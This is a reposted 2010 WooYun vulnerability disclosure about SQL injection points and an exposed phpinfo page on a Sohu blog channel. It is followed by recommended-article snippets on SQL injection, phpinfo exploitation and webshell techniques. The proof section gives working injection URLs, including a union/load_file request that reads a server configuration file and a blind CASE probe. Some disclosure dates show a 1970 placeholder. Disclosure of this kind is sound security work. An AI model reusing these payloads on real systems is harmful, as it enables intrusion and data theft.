搜狐某频道sql多处注入,还有phpinfo()

最新推荐文章于 2023-06-28 07:50:40 发布
最新推荐文章于 2023-06-28 07:50:40 发布
阅读量3.2k 收藏
点赞数
文章标签: web安全 网络安全 安全 hack wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124188535
版权
该博客揭示了搜狐文集存在的多处SQL注入漏洞,包括可通过union操作和load_file加载外部文件,甚至能获取phpinfo信息。漏洞从内部逐步公开,最终于2010年8月向公众披露。修复建议涉及过滤和安全措施。
摘要由CSDN通过智能技术生成

漏洞详情

披露状态:

2010-07-27: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-26: 细节向公众公开

简要描述:

多处存在sql注入,可union,load_file,且有个文件直接phpinfo(),貌似这版块是正在撤掉的?

详细说明:

存在于搜狐文集:http://blog.club.sohu.com/

漏洞证明:

phpinfo:
http://blog.club.sohu.com/info.php
sql注入:
http://blog.club.sohu.com/fenlei_detail.php?fatherid=280%20and%201=0%20union%20select%201,2,load_file%28char%2847,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,50,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102%29%29,4,5,6,7,8,9/*
http://blog.club.sohu.com/wenji_list_diary.php?kindid=100/%28CaSE%20WhEN%20char_length%28database%28%29%29=4%20THEN%201%20ELse%200%20End%29&db=blog001P2
http://blog.club.sohu.com/list_diary.php?kindid=765&db=blog002P4&artnum=276

修复方案:

过滤,intval,删除敏感文件

版权声明:转载请注明来源 blue@乌云

Sword-heart
关注
SQL注入之——Mysql+PHP手工获取webshell
温柔小薛的博客
04-04 1722
Mysql+PHP手工获取webshell 目录Mysql+PHP手工获取webshell一、使用 order by 询字段二、使用联合询来询当前数据库、用户、版本信息等三、获取表名、字段、值四、Mysql root 用户密码存储位置五、对服务器文件进行读写操作六、怎么获取 Web 路径七、利用 sql 注入写入 webshell八、MysQL 获取 web 路径方法总结 只是大概流程,等梳...
PHP 中的SQL注入
干脆利索
01-30 173
magic_quotes_gpc=Off的情况 1.字符串的注入 select: 正常select * from user where username='admin' and password='12$%&*' 利用#作为mysql中的注释:提交username的注入 admin'# 语句变为select * from user where username='admin'#' ...
【MySQL学习笔记】第16章 PHP基础知识(一 PHP基本概念)
fanbu_frank的博客
04-24 178
15.5 什么是PHP 15.5.1 PHP是什么 PHP是在Web服务器端运行的服务器端脚本。PHP全称是Hypertext Prrprocessor,它是一种用于开发Web应用程序的编程语言,支持Apache等多个Web服务器,并支持包括MySQL在内的许多RDBMS。 15.5.2 设置php.ini php.ini是用于设置PHP动作的文本文件 在学习PHP之前,需要对php.ini配置文件设置用于处理时间、时间和时区,以及多字节字符串的相关内容。 设置时区 在MAMP的PHP中,时区的
SOHU某频道分站SQL注入漏洞
swordheart的博客
04-12 335
漏洞详情 披露状态: 2010-07-16: 细节已通知厂商并且等待厂商处理中 2010-08-18: 细节向公众公开 简要描述: SOHU某频道分站存在SQL注入漏洞,可能造成敏感信息泄露等问题。 详细说明: 搜狐数码公社: http://zone.it.sohu.com/forums/tag.php文件中的srchuid存在SQL注入 漏洞证明: 验证URL: http://zone.it.sohu.com/forums/tag.php?name=file&srchuid=250
PHP代码注入PHP代码注入漏洞
cc
03-06 6227
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
360天擎-前台sql注入1
08-03
根据给定的信息,本文将详细解释“360天擎-前台SQL注入1”的知识点,包括如何利用SQL注入漏洞在360天擎系统中执行恶意代码。 ### SQL注入漏洞概述 SQL注入是一种常见的Web安全漏洞,攻击者可以通过在应用程序输入...
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
SQL注入攻击与防御技术白皮书.pdf
10-16
SQL注入攻击与防御技术白皮书.pdf 本文档主要介绍了SQL注入攻击的原理、方式、危害及防御措施,旨在帮助读者更好地理解和防御这种常见的数据库漏洞攻击方式。 1.SQL注入攻击简介 SQL注入攻击是一种针对数据库的...
SQL注入-Mysql高权限读写注入
最新发布
xiaoheizi的博客
06-28 343
1.读写文件时需要知道文件路径,而有的网站会泄露phpinfo.php文件,在phpinfo.php文件中就可以收集路径信息,如:$_SERVER['SCRIPT_FILENAME']就是当前执行脚本的路径。绕过:注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过。-1 union select null,'null',null,null 正常。-1 union select null,null,'null',null 正常。执行命令,让日志记录后门代码。
【某CMS漏洞】SQL注入漏洞分析
HBohan的博客
04-27 1661
前言 这个CMS非常适合入门代码审计的人去学习,因为代码简单且漏洞成因经典,对一些新手有学习价值, 前台注入 从入口开始:/semcms/Templete/default/Include/index.php [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xhTdHBVn-1651041211358)(https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/490ca1b2038f48148c14ac62455278ef~tplv-k
PHPInfo()信息泄漏漏洞利用及提权
热门推荐
weixin_44023460的博客
12-08 3万+
Simeon PHPInfo函数信息泄露漏洞常发生一些默认的安装包,比如phpstudy等,默认安装完成后,没有及时删除这些提供环境测试的文件,比较常见的为phpinfo.php、1.php和test.php,虽然通过phpinfo获取的php环境以及变量等信息,但这些信息的泄露配合一些其它漏洞将有可能导致系统被渗透和提权。 1.1phpinfo函数 PHP中提供了PHPInfo()函数,该函数返...
PHPInfo()信息泄漏——综合利用提权
LiBai'S BLOG
09-25 5268
PHPInfo()信息泄漏在渗透测试中算是低危漏洞,但怎么进一步利用呢?我自己也稀里糊涂就觉得离谱。 这种情况在漏洞扫描及渗透测试中经常遇到就是不知道怎么利用,找了网上很多文章都感觉说的不清不楚,自己没怎么看明白。今天我自己就总结一下。 综合利用 这些信息泄露配合一些其它漏洞将有可能导致系统被渗透和提权。 phpinfo函数暴露出来的有用信息 1、看操作系统为Windows还是Linux 2、看服务器类型并按照类型和版本找已经爆出来的漏洞综合利用 3、看网站默认路径:D:/WWW 通过mssq
ThinkPHP5漏洞分析之SQL注入(七)
Jeromeyoung
01-06 1963
返回到了$instance变量中,这时控制器这块已经基本上处理完了,think\App实际上就是thinkphp\library\think\App.php这个php文件里的App类(在MVC架构中,某些类也是可以叫做控制器),think是一个命名空间。命名空间的概念百度一下就知道了。相信很多人在不懂原理的情况下,看这一串payload是感觉很nb的一个paylaod(因为它长,需要的参数多),像我本人之前就纳闷这payload中为啥还会有反斜杠,s参数名是啥?接下来就是获取方法,调用反射执行类的方法。
SQL注入解决方案(PHP为例)
is_scarecrow的博客
06-24 556
sql注入
如何创建phpinfophp信息?
雅冰石的专栏
09-10 2万+
cd /var/www/htlm 创建一个简单的文本文档并命名为phpinfo.php 代码如下: <?php phpinfo(); ?> 通过浏览器访问这个文件即可显示PHP信息 如:http://192.168.6.52/phpinfo.php --本篇文章转自:http://blog.sina.com.cn/s/blog_624034130101nn...
phpinfo漏洞信息利用
墨痕诉清风的博客
10-10 7595
libxml 2.9以前的版本默认支持并开启了外部实体的引用,服务端解析用户提交的 xml 文件时未对 xml 文件引用的外部实体(含外部普通实体和外部参数实体)做合适的处理,会导致XXE。向phpinfo()页面post一个shell(自己写一个上传页面),可以在_FILES[“file1”]中看到上传的临时文件,如果有个lfi,便可以直接getshell了。php标签有4种形式,如果这个选项不开启的话(一般默认不开启),使用asp的标签是不会解析的。还是标签的问题,允许这种形式,并且
SQL注入16】SQL漏洞利用之读写文件
Fighting_hawk的博客
02-22 4814
1. 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。 2. 掌握利用SQL漏洞进行文件读写的方法。 3. 后续需要进一步了解如何获取网站根目录路径的方法。
PHP防止SQL注入安全配置与函数限制
7. 禁用危险函数:通过`disable_functions`配置项,禁用可能导致SQL注入安全问题的函数,如`system`, `passthru`, `exec`, `shell_exec`, `popen`, `phpinfo`等。 8. 输入过滤与验证:对用户提交的数据进行严格的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值